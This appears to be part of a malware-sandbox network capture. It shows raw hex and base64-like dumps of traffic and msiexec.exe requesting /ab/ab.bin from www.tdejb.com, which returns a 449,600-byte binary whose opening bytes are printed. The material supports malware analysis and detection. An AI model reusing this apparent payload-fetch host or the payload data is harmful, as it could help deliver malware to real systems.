                                                                                  2024-12-19 11:47:33 UTC7960INData Raw: 63 51 47 62 36 77 4b 7a 48 72 75 6e 6b 51 73 41 63 51 47 62 63 51 47 62 41 31 77 6b 42 48 45 42 6d 2b 73 43 4b 4f 71 35 44 39 35 78 65 33 45 42 6d 2b 73 43 69 32 65 42 77 55 70 62 6f 2b 58 72 41 75 33 64 63 51 47 62 67 65 6c 5a 4f 52 56 68 36 77 4a 6c 6d 2b 73 43 59 72 7a 72 41 70 64 32 63 51 47 62 75 6c 33 52 55 6b 70 78 41 5a 76 72 41 6f 73 37 63 51 47 62 63 51 47 62 4d 63 72 72 41 69 71 2b 36 77 4a 62 54 34 6b 55 43 33 45 42 6d 33 45 42 6d 39 48 69 36 77 4c 51 66 58 45 42 6d 34 50 42 42 48 45 42 6d 33 45 42 6d 34 48 35 47 53 48 58 41 58 7a 4e 63 51 47 62 36 77 4c 38 77 59 74 45 4a 41 52 78 41 5a 74 78 41 5a 75 4a 77 33 45 42 6d 2b 73 43 59 70 61 42 77 77 66 38 56 41 44 72 41 72 62 74 63 51 47 62 75 71 34 64 58 59 50 72 41 6a 6c 70 63 51 47 62 67 66 4a
                                                                                  Data Ascii: cQGb6wKzHrunkQsAcQGbcQGbA1wkBHEBm+sCKOq5D95xe3EBm+sCi2eBwUpbo+XrAu3dcQGbgelZORVh6wJlm+sCYrzrApd2cQGbul3RUkpxAZvrAos7cQGbcQGbMcrrAiq+6wJbT4kUC3EBm3EBm9Hi6wLQfXEBm4PBBHEBm3EBm4H5GSHXAXzNcQGb6wL8wYtEJARxAZtxAZuJw3EBm+sCYpaBwwf8VADrArbtcQGbuq4dXYPrAjlpcQGbgfJ
                                                                                  2024-12-19 11:47:33 UTC8000INData Raw: 77 44 44 58 4c 61 56 2b 71 43 73 50 38 5a 58 35 35 74 72 49 65 35 45 69 36 68 71 33 76 41 74 33 77 4b 6b 73 78 30 31 43 41 41 4c 39 4e 68 4a 4d 72 62 45 72 79 46 41 71 4c 78 72 72 64 4e 77 56 4c 45 66 63 46 53 78 48 33 42 55 73 52 39 77 56 4c 45 66 63 46 53 78 48 33 42 55 73 52 7a 75 61 35 67 79 49 63 37 31 50 78 51 6c 76 38 64 4b 55 32 6a 39 4b 6e 35 72 47 4d 6c 64 77 70 6b 50 53 71 63 66 65 46 53 78 2b 6a 79 72 33 46 47 63 4e 44 38 63 30 6c 4d 63 4c 2f 4e 2f 47 78 6a 66 5a 4c 66 45 68 52 37 44 4f 50 68 51 32 32 6c 6e 74 57 45 4b 71 43 66 32 46 32 59 36 72 69 4a 48 6d 64 4d 55 73 58 6d 78 66 47 59 2b 50 70 35 44 56 68 70 4a 59 4c 4d 68 61 62 43 68 30 61 67 45 74 4d 50 65 42 46 31 6f 49 75 70 44 2b 48 62 6f 73 39 42 78 64 75 4b 78 46 33 42 58 67 79 7a 49
                                                                                  Data Ascii: wDDXLaV+qCsP8ZX55trIe5Ei6hq3vAt3wKksx01CAAL9NhJMrbEryFAqLxrrdNwVLEfcFSxH3BUsR9wVLEfcFSxH3BUsRzua5gyIc71PxQlv8dKU2j9Kn5rGMldwpkPSqcfeFSx+jyr3FGcND8c0lMcL/N/GxjfZLfEhR7DOPhQ22lntWEKqCf2F2Y6riJHmdMUsXmxfGY+Pp5DVhpJYLMhabCh0agEtMPeBF1oIupD+Hbos9BxduKxF3BXgyzI
                                                                                  2024-12-19 11:47:33 UTC8000INData Raw: 71 77 66 35 7a 42 67 54 69 61 52 33 69 79 54 6f 35 53 48 66 41 44 52 56 42 63 53 2f 38 79 39 41 47 4b 6d 33 50 67 46 66 48 38 63 34 33 51 71 75 42 4c 6a 7a 76 67 2b 68 6b 51 63 56 50 36 55 4e 42 4d 6e 51 2b 34 5a 53 53 65 44 48 65 75 33 48 70 66 6f 30 46 43 78 48 56 63 4a 37 7a 47 48 39 4c 55 66 63 52 70 65 68 39 4a 64 57 78 69 2b 7a 34 31 77 75 6c 4f 2b 57 74 58 4e 62 7a 74 2f 2b 61 63 37 48 77 79 4f 54 39 36 72 6f 72 30 73 70 51 36 4a 54 6f 53 7a 2f 53 77 69 2b 38 46 49 6f 4b 4c 32 43 53 4e 75 4b 70 71 54 6d 78 57 6f 61 65 67 74 6d 43 4c 38 54 65 39 47 68 61 55 43 48 74 52 78 56 6f 49 6c 47 33 42 57 6c 6f 59 72 68 61 63 49 48 46 53 78 48 33 42 55 73 52 39 77 56 4c 45 66 63 46 53 78 48 33 42 55 73 52 39 77 56 4c 45 66 63 2f 76 4c 45 70 4e 37 2f 6b 37 6b
                                                                                  Data Ascii: qwf5zBgTiaR3iyTo5SHfADRVBcS/8y9AGKm3PgFfH8c43QquBLjzvg+hkQcVP6UNBMnQ+4ZSSeDHeu3Hpfo0FCxHVcJ7zGH9LUfcRpeh9JdWxi+z41wulO+WtXNbzt/+ac7HwyOT96ror0spQ6JToSz/Swi+8FIoKL2CSNuKpqTmxWoaegtmCL8Te9GhaUCHtRxVoIlG3BWloYrhacIHFSxH3BUsR9wVLEfcFSxH3BUsR9wVLEfc/vLEpN7/k7k
                                                                                  2024-12-19 11:47:33 UTC8000INData Raw: 63 79 46 31 46 51 30 66 6a 35 36 78 39 74 30 56 4c 4b 38 4f 6b 69 68 48 6a 4b 31 61 33 2f 45 65 4b 57 41 37 68 2f 64 79 73 70 76 73 6f 56 55 74 50 58 49 66 59 74 75 77 57 59 58 57 4e 35 54 6f 75 53 68 7a 53 6f 54 78 78 78 4e 74 65 2b 38 69 47 6a 55 7a 34 48 35 50 70 6b 31 31 46 6d 57 67 67 41 33 45 6c 4e 31 65 70 30 65 38 78 69 31 68 75 67 2f 6e 6c 4e 32 66 6e 45 57 66 46 30 43 63 7a 45 37 55 69 42 57 50 71 68 71 67 35 43 56 63 72 71 4b 77 48 32 4d 4e 56 61 59 4b 38 69 62 69 58 59 70 5a 73 30 30 6f 61 4d 73 57 5a 6a 64 76 77 64 73 42 73 43 58 63 77 48 4f 70 6c 49 53 52 35 68 35 6d 39 36 59 51 35 4e 6b 70 4e 5a 57 59 57 2f 66 68 52 43 74 79 79 44 2f 6a 6a 71 6e 36 76 33 52 50 4c 32 6a 4b 34 65 7a 71 6c 4d 6e 47 78 50 53 54 45 53 7a 4f 57 65 30 73 52 39 79
                                                                                  Data Ascii: cyF1FQ0fj56x9t0VLK8OkihHjK1a3/EeKWA7h/dyspvsoVUtPXIfYtuwWYXWN5TouShzSoTxxxNte+8iGjUz4H5Ppk11FmWggA3ElN1ep0e8xi1hug/nlN2fnEWfF0CczE7UiBWPqhqg5CVcrqKwH2MNVaYK8ibiXYpZs00oaMsWZjdvwdsBsCXcwHOplISR5h5m96YQ5NkpNZWYW/fhRCtyyD/jjqn6v3RPL2jK4ezqlMnGxPSTESzOWe0sR9y
                                                                                  2024-12-19 11:47:33 UTC8000INData Raw: 43 6f 53 39 4f 71 77 63 45 5a 36 6a 61 46 61 59 54 78 56 75 2f 30 4f 75 33 36 2f 6e 49 4e 4f 51 36 5a 62 38 6c 73 53 53 47 52 51 73 53 4e 30 4f 41 30 66 63 46 53 78 48 33 42 55 73 52 39 77 56 4c 45 66 63 46 53 78 48 33 42 55 73 52 39 77 56 4c 4c 7a 63 51 55 7a 74 51 75 69 52 4e 57 6c 61 57 34 6c 79 2b 57 30 74 4d 77 70 72 41 44 31 44 5a 51 56 56 55 47 42 49 33 51 51 34 52 39 77 56 4c 45 66 63 46 53 78 48 33 42 55 73 52 39 77 56 4c 45 66 63 46 53 78 48 33 42 55 73 72 53 42 57 31 63 38 4b 36 38 63 55 5a 36 77 6d 50 71 32 55 33 39 43 69 44 67 76 47 4c 77 65 6a 35 68 75 55 37 34 50 5a 4b 55 49 57 51 4a 7a 4e 52 73 57 49 46 5a 2b 75 41 50 6d 4e 65 73 42 4e 41 6d 49 4f 6b 54 68 6c 4d 6f 68 51 44 67 76 46 69 76 71 2b 79 63 30 51 50 6c 65 6a 4e 35 61 56 72 6d 43
                                                                                  Data Ascii: CoS9OqwcEZ6jaFaYTxVu/0Ou36/nINOQ6Zb8lsSSGRQsSN0OA0fcFSxH3BUsR9wVLEfcFSxH3BUsR9wVLLzcQUztQuiRNWlaW4ly+W0tMwprAD1DZQVVUGBI3QQ4R9wVLEfcFSxH3BUsR9wVLEfcFSxH3BUsrSBW1c8K68cUZ6wmPq2U39CiDgvGLwej5huU74PZKUIWQJzNRsWIFZ+uAPmNesBNAmIOkThlMohQDgvFivq+yc0QPlejN5aVrmC
                                                                                  2024-12-19 11:47:33 UTC8000INData Raw: 4e 37 75 65 2b 2f 6f 63 61 6b 4a 2f 4a 45 35 70 61 67 4b 52 4a 75 78 33 7a 47 54 48 41 6a 6b 74 39 68 79 36 4c 4f 59 65 45 45 2f 63 4c 63 4d 30 32 50 34 43 4e 76 69 53 64 71 4c 48 2b 6b 74 35 59 49 46 61 45 4f 56 4e 34 34 31 77 58 79 4d 35 35 52 42 35 44 50 59 70 35 6c 33 35 51 6c 33 6f 79 50 39 2f 6b 38 35 4f 2f 65 48 73 37 43 55 56 4c 45 66 63 46 53 78 48 33 42 55 73 52 39 77 56 4c 45 66 63 46 53 78 48 33 42 55 73 52 39 7a 30 71 49 78 58 71 37 70 41 44 58 53 2f 75 66 4d 49 7a 58 61 62 56 72 72 7a 56 31 67 77 45 47 50 4c 52 4e 39 6d 6c 4d 50 59 6e 2f 33 44 78 69 75 52 4f 32 4c 4e 6c 4d 50 38 37 59 44 33 46 30 43 63 7a 45 62 6b 69 42 57 32 70 41 36 51 67 4b 41 44 4d 37 79 65 36 51 6f 69 39 76 34 7a 69 53 48 52 30 2f 4b 71 36 32 6d 7a 75 6d 39 35 50 7a 4d
                                                                                  Data Ascii: N7ue+/ocakJ/JE5pagKRJux3zGTHAjkt9hy6LOYeEE/cLcM02P4CNviSdqLH+kt5YIFaEOVN441wXyM55RB5DPYp5l35Ql3oyP9/k85O/eHs7CUVLEfcFSxH3BUsR9wVLEfcFSxH3BUsR9z0qIxXq7pADXS/ufMIzXabVrrzV1gwEGPLRN9mlMPYn/3DxiuRO2LNlMP87YD3F0CczEbkiBW2pA6QgKADM7ye6Qoi9v4ziSHR0/Kq62mzum95PzM
                                                                                  2024-12-19 11:47:33 UTC8000INData Raw: 53 64 61 75 75 47 4c 34 38 47 35 6c 32 70 64 46 56 64 4a 38 74 63 79 74 7a 6a 6b 70 54 55 38 30 67 63 4d 65 53 71 69 64 68 2f 32 35 39 39 34 56 34 47 79 54 7a 78 6f 45 2b 35 72 63 48 4c 56 6d 4b 4e 6f 32 4f 6e 43 63 4d 45 73 47 66 69 39 31 36 66 4b 30 50 63 63 6c 48 31 51 36 38 32 39 70 79 6b 6a 63 41 76 70 48 33 42 55 73 52 39 77 56 4c 45 66 63 46 53 78 48 33 42 55 73 52 39 77 56 4c 45 66 63 46 53 79 37 69 2f 47 67 77 72 39 78 59 68 6f 6f 45 6c 2b 49 41 53 64 6d 51 44 4b 69 42 62 48 78 66 66 72 34 5a 70 2b 74 61 2f 68 47 35 4c 35 67 6c 41 42 6a 78 66 72 70 52 46 30 68 43 43 7a 55 37 75 57 76 58 77 30 6f 52 31 57 59 47 55 58 63 46 58 72 35 77 72 78 71 44 56 33 37 58 61 69 6b 37 36 32 70 4a 50 72 67 43 46 55 4c 55 4f 61 79 37 58 57 6c 7a 4c 4f 58 76 55 46
                                                                                  Data Ascii: SdauuGL48G5l2pdFVdJ8tcytzjkpTU80gcMeSqidh/25994V4GyTzxoE+5rcHLVmKNo2OnCcMEsGfi916fK0PcclH1Q6829pykjcAvpH3BUsR9wVLEfcFSxH3BUsR9wVLEfcFSy7i/Ggwr9xYhooEl+IASdmQDKiBbHxffr4Zp+ta/hG5L5glABjxfrpRF0hCCzU7uWvXw0oR1WYGUXcFXr5wrxqDV37Xaik762pJPrgCFULUOay7XWlzLOXvUF
                                                                                  2024-12-19 11:47:33 UTC8000INData Raw: 46 2b 48 33 53 53 73 65 47 30 50 61 74 77 66 34 70 78 36 4f 72 7a 67 58 70 63 2b 74 68 54 7a 2f 31 71 52 64 35 2b 78 31 6d 6d 75 74 74 5a 65 78 53 7a 68 64 31 2b 67 49 64 31 57 6c 58 52 33 36 68 46 56 73 73 6a 46 47 34 53 4c 47 69 58 49 50 78 50 39 70 61 34 6a 44 46 77 75 4c 78 31 39 43 30 46 2b 4c 52 4a 2b 73 4a 71 5a 38 50 78 72 6b 4d 4c 51 4f 72 64 63 57 30 4d 4a 62 77 49 61 63 2f 42 42 6a 50 63 73 70 61 70 54 62 42 77 39 65 57 63 59 72 72 41 63 63 73 5a 54 62 67 7a 55 58 52 38 59 62 79 49 72 45 35 70 77 6a 4b 61 34 4d 64 36 78 70 58 50 72 51 41 50 4f 71 79 6e 33 66 44 54 52 37 75 4b 59 55 6e 56 6c 38 34 49 66 2b 56 74 55 38 4a 38 62 7a 79 6b 64 7a 52 68 51 34 70 4d 55 52 46 69 6e 44 58 74 67 76 49 52 73 56 51 38 2b 36 6c 41 53 65 39 45 61 58 52 47 64
                                                                                  Data Ascii: F+H3SSseG0Patwf4px6OrzgXpc+thTz/1qRd5+x1mmuttZexSzhd1+gId1WlXR36hFVssjFG4SLGiXIPxP9pa4jDFwuLx19C0F+LRJ+sJqZ8PxrkMLQOrdcW0MJbwIac/BBjPcspapTbBw9eWcYrrAccsZTbgzUXR8YbyIrE5pwjKa4Md6xpXPrQAPOqyn3fDTR7uKYUnVl84If+VtU8J8bzykdzRhQ4pMURFinDXtgvIRsVQ8+6lASe9EaXRGd
                                                                                  2024-12-19 11:47:33 UTC8000INData Raw: 69 6f 51 37 48 58 4e 68 6f 39 32 31 72 4d 31 32 46 2f 4c 78 52 5a 53 59 68 35 32 44 63 6e 73 63 6e 38 66 5a 4d 31 37 37 32 54 69 52 58 34 76 6f 47 66 42 65 74 52 76 4f 37 4a 61 4c 6f 74 62 33 51 64 39 55 4e 65 53 45 61 6b 70 2f 36 46 31 6f 70 43 43 63 67 65 46 59 4e 65 69 77 6f 48 4f 6f 57 72 7a 62 76 7a 4b 6e 6e 38 66 6a 4f 59 51 61 4c 62 42 33 46 53 78 48 33 42 55 73 52 39 77 56 4c 45 66 63 46 53 78 48 33 42 55 73 52 39 77 56 4c 45 66 63 2f 51 73 6f 63 47 38 37 6b 57 50 55 35 38 35 68 36 53 31 48 33 4a 7a 72 53 4e 30 4c 6f 55 66 63 46 53 78 48 33 42 55 73 52 39 77 56 4c 45 66 63 46 53 78 48 33 42 55 73 52 39 77 56 4c 4c 31 77 4b 53 71 74 68 6c 56 74 66 57 69 6e 38 49 6f 6a 6e 4d 66 72 68 68 6a 7a 65 69 4a 4c 6b 42 43 4e 72 48 33 50 4e 45 69 74 68 6a 52
                                                                                  Data Ascii: ioQ7HXNho921rM12F/LxRZSYh52Dcnscn8fZM1772TiRX4voGfBetRvO7JaLotb3Qd9UNeSEakp/6F1opCCcgeFYNeiwoHOoWrzbvzKnn8fjOYQaLbB3FSxH3BUsR9wVLEfcFSxH3BUsR9wVLEfc/QsocG87kWPU585h6S1H3JzrSN0LoUfcFSxH3BUsR9wVLEfcFSxH3BUsR9wVLL1wKSqthlVtfWin8IojnMfrhhjzeiJLkBCNrH3PNEithjR
                                                                                  2024-12-19 11:47:33 UTC8000INData Raw: 75 79 5a 69 59 61 32 30 71 6f 47 69 43 56 33 57 39 52 37 6d 76 4b 56 63 51 77 31 55 46 42 38 52 39 7a 45 69 39 72 65 46 70 4f 65 4b 53 70 65 34 47 2b 79 43 39 73 79 6d 44 59 58 51 50 66 61 73 43 59 79 71 69 33 50 68 49 50 5a 6e 75 48 2f 6d 71 78 45 58 6f 69 33 35 68 30 4b 6e 2b 69 6f 55 4c 45 65 4f 72 77 78 2b 37 55 71 74 74 5a 46 46 6d 42 78 64 35 32 7a 6c 57 52 47 6c 64 5a 31 4d 6b 2f 4f 75 2b 4d 56 4b 36 62 66 2f 4f 79 51 2b 33 7a 4b 61 4d 62 33 4b 48 53 35 36 59 62 4e 58 7a 74 5a 4f 55 2b 68 51 43 46 44 78 6b 4c 74 4b 38 64 7a 6f 56 6e 61 76 44 4e 6b 76 52 39 4d 55 37 78 44 63 46 53 78 48 33 42 55 73 52 39 77 56 4c 45 66 63 46 53 78 48 33 42 55 73 52 39 77 56 4c 45 63 2f 79 57 51 33 36 4d 34 45 77 33 4c 51 7a 4a 5a 67 6d 48 36 47 49 2f 30 41 4a 74 77
                                                                                  Data Ascii: uyZiYa20qoGiCV3W9R7mvKVcQw1UFB8R9zEi9reFpOeKSpe4G+yC9symDYXQPfasCYyqi3PhIPZnuH/mqxEXoi35h0Kn+ioULEeOrwx+7UqttZFFmBxd52zlWRGldZ1Mk/Ou+MVK6bf/OyQ+3zKaMb3KHS56YbNXztZOU+hQCFDxkLtK8dzoVnavDNkvR9MU7xDcFSxH3BUsR9wVLEfcFSxH3BUsR9wVLEc/yWQ36M4Ew3LQzJZgmH6GI/0AJtw


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  1192.168.2.449738202.71.109.2284435948C:\Windows\SysWOW64\msiexec.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-12-19 11:48:01 UTC167OUTGET /ab/ab.bin HTTP/1.1
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                  Host: www.tdejb.com
                                                                                  Cache-Control: no-cache
                                                                                  2024-12-19 11:48:02 UTC223INHTTP/1.1 200 OK
                                                                                  Date: Thu, 19 Dec 2024 11:48:01 GMT
                                                                                  Server: Apache
                                                                                  Last-Modified: Tue, 03 Dec 2024 03:27:16 GMT
                                                                                  Accept-Ranges: bytes
                                                                                  Content-Length: 449600
                                                                                  Connection: close
                                                                                  Content-Type: application/octet-stream
                                                                                  2024-12-19 11:48:02 UTC7969INData Raw: e4 47 1f 45 3d dd a3 e0 6d 19 db 76 50 37 22 40 fe 29 88 ff 9c 7c 0b 11 04 fc dc ee e6 0b c2 1d 5b 94 dc 82 ef c4 e7 1d a6 e1 fc 84 69 99 af 58 1e ab b9 4a 0e e6 e3 79 a1 6a 74 10 24 8a a5 2d 99 5f fa f9 c4 a1 54 94 8c 94 52 0a 80 b8 26 bd 1e c1 35 f2 74 cf a0 2d 09 a9 df 4e 72 07 af 69 cf 13 e3 0d 6c dc c7 08 65 4d 87 fd 1e 2a a4 07 d2 85 a5 7c af 18 58 d6 ba 87 3d 88 2e 1d 14 a3 fe 66 f0 79 4c 83 90 93 0e e0 9d 4f ba 29 bb e4 92 a6 c0 1c e2 c6 08 f3 81 d7 02 23 81 aa ba 4e 27 17 4d 26 b2 ff c2 bf b0 a6 81 b2 f1 71 1f 79 99 0e c2 4f 27 85 34 34 7c 30 d9 12 e9 25 80 c6 b0 59 04 58 35 50 ed 39 a6 ec d5 7a ad 85 7b 00 f9 03 d9 7f 04 ea fc ec 2f 3d c7 fd 5c 46 c3 3f 1a fb b9 21 ab 26 0a ec 6c ee ec 9c 7a e5 08 31 cb 0a 50 64 fd ae 9e a5 ee 74 60 6e 6d a3 0c
                                                                                  Data Ascii: GE=mvP7"@)|[iXJyjt$-_TR&5t-NrileM*|X=.fyLO)#N'M&qyO'44|0%YX5P9z{/=\F?!&lz1Pdt`nm
                                                                                  2024-12-19 11:48:02 UTC8000INData Raw: 94 c8 5a df 80 bd 7e 84 86 d2 d4 7b 9c af fc 68 81 ad ee 90 97 14 86 8b 6f a7 bd 94 80 a5 ad 7e 12 f9 d6 1c d9 51 c5 35 ab c2 e1 47 a1 0c bb ec e3 30 b7 01 ca 08 82 16 56 50 6c ed 85 59 04 b0 6c 70 10 91 07 29 70 f8 17 cd 02 00 77 d1 3d ab 55 b4 d1 eb e0 0d 83 b4 34 92 41 f5 5a 49 54 56 84 1d d9 1b 28 d9 15 1c ac f0 99 11 0a c4 7a 86 4d 78 5d 9a 8b 6d 42 19 d9 19 18 d6 40 9d ec 84 5a 94 1a b7 b3 6f b5 74 03 c4 f6 9e ae ac 28 3c e0 18 d9 b7 f2 fe 5f 7b b5 4c 35 bc 5e 97 72 67 f4 58 8f 9b 02 9b d1 a4 ec c5 08 c0 ab 9a 40 92 ef bc b2 3c 4b 7e 94 dd f2 bf cc 23 89 ad 77 cc ec 20 43 63 b9 b4 f5 b6 e7 48 a1 72 fd 7e 5e 54 38 f2 40 c6 da 71 6e 3e 45 db 5c 80 09 03 4a b2 ca c3 ce 60 f6 f5 96 ac a7 5e 58 99 69 cb 81 54 92 df a4 6c 1d b7 b3 f8 65 72 f9 1a d7 9b fb
                                                                                  Data Ascii: Z~{ho~Q5G0VPlYlp)pw=U4AZITV(zMx]mB@Zot(<_{L5^rgX@<K~#w CcHr~^T8@qn>E\J`^XiTler
                                                                                  2024-12-19 11:48:02 UTC8000INData Raw: e6 f2 97 50 41 1c 7e 14 68 71 2e 90 15 88 8e 21 e7 bc ce da cb 8a a9 2f a6 f1 bf f4 22 8e 01 fa 0e ac 90 5a 57 fd 5c 55 62 9c 65 71 cb 28 39 63 6d 26 b2 8b 6d 82 47 04 ec ae 02 55 ce 9e 77 e1 94 76 84 f9 b9 d0 6e de ae 0c 21 d2 c4 c0 93 db 8f 74 92 9f d0 d5 2d 93 83 f1 30 c9 a9 a9 30 98 55 1c aa 25 22 ab 48 b0 d4 2d 60 26 12 2c ff 69 ed c5 96 d1 82 f5 3b 99 fc f3 79 ee 90 f2 d8 92 95 59 09 62 2a 7b 3d 98 6d 74 89 d3 8c 27 ca 9b c4 a1 90 24 c4 81 82 e7 67 e4 b8 b2 df e4 6b bf ee 5f 27 bd c6 ae 60 9c e5 2e 3a 99 d4 ca 64 96 f6 f5 67 bc 3c 9e 6f af ea 29 64 40 65 ea b4 ae 0f 30 c7 3a 23 79 20 7b b4 af e7 f3 46 08 e4 bc 76 a9 a8 f0 71 5b 2f df 16 2e 32 6d 79 5c 5b 0c 97 41 19 58 88 8c ac bd 69 03 9a 13 b4 be 95 7a 16 49 13 cf 1d 46 84 a9 88 7a b8 8f 0d ad f1
                                                                                  Data Ascii: PA~hq.!/"ZW\Ubeq(9cm&mGUwvn!t-00U%"H-`&,i;yYb*{=mt'$gk_'`.:dg<o)d@e0:#y {Fvq[/.2my\[AXizIFz
                                                                                  2024-12-19 11:48:02 UTC8000INData Raw: 56 8f 45 fb 31 ec 2d 37 05 9d fe f0 18 d8 18 48 d8 37 4f 39 c4 f6 40 ee fe d4 8d fd c8 90 cd 48 94 6e ad 6b 5d 73 62 50 47 d9 ff c4 9f f8 25 2e d3 4c ab 5e 26 3d 59 90 c0 c1 f2 1f 7c 47 e5 5a b8 59 44 9e b1 7f c6 bc 70 35 55 1b b1 4e 13 11 a1 90 64 63 99 6d 20 ff 79 39 66 09 e5 07 70 74 87 f1 f7 1c 9c 74 78 7c 1d 1a 48 15 1e aa 1a 9d 77 83 22 1e 76 85 ca 54 f2 54 a0 7a 88 4c 5e ad 68 20 8d c2 7a 3e d1 a0 81 1a b9 31 b0 a7 70 ea 13 a1 f4 19 5c a8 90 bf 46 c9 ae 94 9b 2b c8 5c 52 fc 06 dc c0 1d 64 34 84 69 84 6c ef c5 d0 1a cc 3b c5 7e c6 86 d4 de bd 17 80 63 3b ac 44 08 1b b0 e3 af fa e0 ba e0 7c 11 76 21 e0 eb 2a 55 19 a8 c5 03 20 6d 81 30 2b 4e d9 c0 55 79 b6 71 79 2a 64 29 91 94 c4 ba a2 68 43 9e 11 45 5e e7 ea c4 47 69 7a 09 e4 3e d3 4d 5d 36 e8 02 ba
                                                                                  Data Ascii: VE1-7H7O9@Hnk]sbPG%.L^&=Y|GZYDp5UNdcm y9fpttx|Hw"vTTzL^h z>1p\F+\Rd4il;~c;D|v!*U m0+NUyqy*d)hCE^Giz>M]6
                                                                                  2024-12-19 11:48:02 UTC8000INData Raw: 52 d9 1a a5 bb f8 64 b4 28 ae c6 60 db 80 56 85 70 6f 9b ee b1 09 35 47 fe 27 51 5d 6d 61 a8 85 58 e1 4e 14 43 ac d4 9b 4b fe 1c 15 b1 70 68 52 cf 77 61 c9 70 c0 67 e0 69 dc 23 9d c1 45 b8 86 b1 af 3f 51 6a a1 79 c7 df 01 32 64 17 30 98 ba 9b c5 85 15 c7 34 58 c5 70 78 63 55 88 4d a8 34 da ab b3 81 df a0 a0 b1 95 bb 1a 48 93 da b3 c9 e7 df 35 84 3e 05 bc 17 a2 d3 23 02 0b 2a 06 b9 42 92 27 92 80 e7 90 7a 01 88 b9 b3 23 a3 3c 27 9a db ae 05 b3 0e 13 c7 84 c7 10 8e 8a e9 ed a2 48 5c 7d 10 b8 f0 f8 fb cc 9b b6 e4 69 a2 6b 4b 8d a2 84 12 a5 54 6e e9 c6 c9 70 48 b2 61 8a b0 a0 62 56 d6 81 2c ca 6b cb 23 18 79 7b cf fe 54 0e c1 80 84 73 fd 26 02 c3 81 7e 73 2a 89 ee 3b ef 53 c6 6b c3 98 75 ee 23 cc 88 ca 88 78 d6 ee f7 d2 63 4c 5f e9 2a 57 28 4a be 5b ba 2a cd
                                                                                  Data Ascii: Rd(`Vpo5G'Q]maXNCKphRwapgi#E?Qjy2d04XpxcUM4H5>#*B'z#<'H\}ikKTnpHabV,k#y{Ts&~s*;Sku#xcL_*W(J[*
                                                                                  2024-12-19 11:48:02 UTC8000INData Raw: 97 0c 2e ef fd a9 89 bc 69 4b 8d c4 88 5c 0f dc b5 40 0c d7 e5 82 74 b6 ca 64 25 1f 20 27 28 13 ed 94 4b d5 bd c9 5b fc b1 f3 a2 da e9 13 b0 00 a7 a5 80 fc 7f 3d 46 63 5f c9 d8 66 8c 4f fc f1 90 f3 fe 2c f1 c4 cb 47 79 11 a5 f3 53 4d 74 7d 15 84 c3 ad bc 21 ee 8a 8a dd 57 90 9b 3d bf 69 2c 28 fd a1 6d c1 f2 e6 8b d7 21 8a 74 7d 34 cf 65 ef e2 51 13 97 1e 95 02 32 82 7c bc 9c c4 61 a7 ff 12 0d 9a 49 0d a0 18 9f a2 fc ca 01 fe 0d 95 1d 19 17 4f 01 4b 59 fc fa 52 7c bf e6 f8 10 fb 28 05 0d da 7f b9 3d cc e7 97 fa 93 26 ff 12 23 40 83 3c a2 7d a9 63 f9 81 44 0c 69 be 99 79 e3 7e ff a3 73 bf 9f da 97 ba 4c a7 7f f4 08 fe 19 49 b6 1b 8b ba 59 be 95 d9 13 1d 7f ab cd b2 25 a5 b8 d0 ff bb 5f 30 91 e0 8b bd 9d bd d4 fa 78 a7 27 dc f8 c2 3b 1b 6c 68 84 8b c0 fa 2a
                                                                                  Data Ascii: .iK\@td% '(K[=Fc_fO,GySMt}!W=i,(m!t}4eQ2|aIOKYR|(=&#@<}cDiy~sLIY%_0x';lh*
                                                                                  2024-12-19 11:48:02 UTC8000INData Raw: 5e e0 34 e6 79 3e d2 8b 8c 98 b5 59 1f b0 00 a9 5f 6e 88 7d 7c 52 06 f2 39 05 b9 3a 82 26 c6 8c a4 fa 7f 38 22 08 1e ae 34 11 e3 ad 1f 74 62 4d 97 ca 29 36 3c 97 63 8c 86 4e ff a7 94 a6 cb fc 26 d5 cc af a3 f1 05 ec 15 f8 c9 34 f1 ec 69 f7 1c 66 36 cd f5 34 de 72 06 d0 1f 2f e9 3d 5c 87 56 fb 22 d3 76 d4 b6 13 de 67 8a 99 61 68 d5 0b 23 ae f4 39 2f 93 2d 68 cd 12 ff 07 10 00 5d 6f 45 4c 9b 78 6e 79 37 bf b2 93 73 39 8a e2 bd ad 20 ef 4d eb ec 08 a8 fb 65 60 ac 93 0c 9f 58 94 fe b7 5f 3b 09 16 ed cf 4b 51 49 cb cf 92 bf 78 4d 8e 6d 60 21 92 44 8b f1 e4 37 4f 15 67 82 68 b3 bd 52 57 32 fd 8e bf 61 75 54 c8 e4 94 d6 8b 20 32 81 ff 98 af 28 47 7f 13 88 c4 64 3e dc 7f 9c f0 1c 35 97 e9 eb b1 db 39 8c 0e c7 d3 ca b5 b3 40 99 21 46 7c b6 82 cd 68 14 40 4d 40 29
                                                                                  Data Ascii: ^4y>Y_n}|R9:&8"4tbM)6<cN&4if64r/=\V"vgah#9/-h]oELxny7s9 Me`X_;KQIxMm`!D7OghRW2auT 2(Gd>59@!F|h@M@)
                                                                                  2024-12-19 11:48:02 UTC8000INData Raw: 01 b0 75 a0 8f 57 29 8c 6f 5e e2 fc 7a 57 c0 cc d7 d6 69 93 7e a4 92 1a de 46 22 f8 10 65 e9 14 75 7c ad 6f fc 33 b3 3e fc 6f fb 11 54 07 d5 de 01 aa e3 22 03 18 2c 88 bc 3e ad d7 2c 6b 3b 0a c2 73 2d 0e ac 2d b6 b0 f8 3b e3 2f 2b 0f a8 f9 cb 7f 10 d3 e9 7d 92 c1 bb 10 15 4b 85 99 14 35 05 04 ba 3e c6 d5 d8 f5 ce 95 83 0b af 80 27 57 d6 5f b9 f3 a5 ce 70 ea 48 24 eb 2a eb 06 7e 68 1f d4 e2 6d 29 e7 ef 09 b4 4c 57 3a 1f d9 ac 4a 11 84 74 7d 7f df 59 f5 2b 5f 1e 89 ef 1d c4 64 f1 20 a3 dd a8 36 48 5f ff 9f 9d 0e 84 04 aa 8d 2a d4 30 ab 91 c4 33 a3 24 bb f3 41 30 03 d5 ed 8a b4 4a 42 43 8c 67 16 91 dd 15 a6 a3 3f 9d 58 24 a6 a7 8a 70 19 0c 3f 89 31 09 d5 e8 f7 df 10 76 80 4f 23 6c 2e 18 45 af 60 47 52 f5 3d 5f ee 3a 78 2a ae 5d 52 d9 c4 3d 3b 37 37 ab 08 61
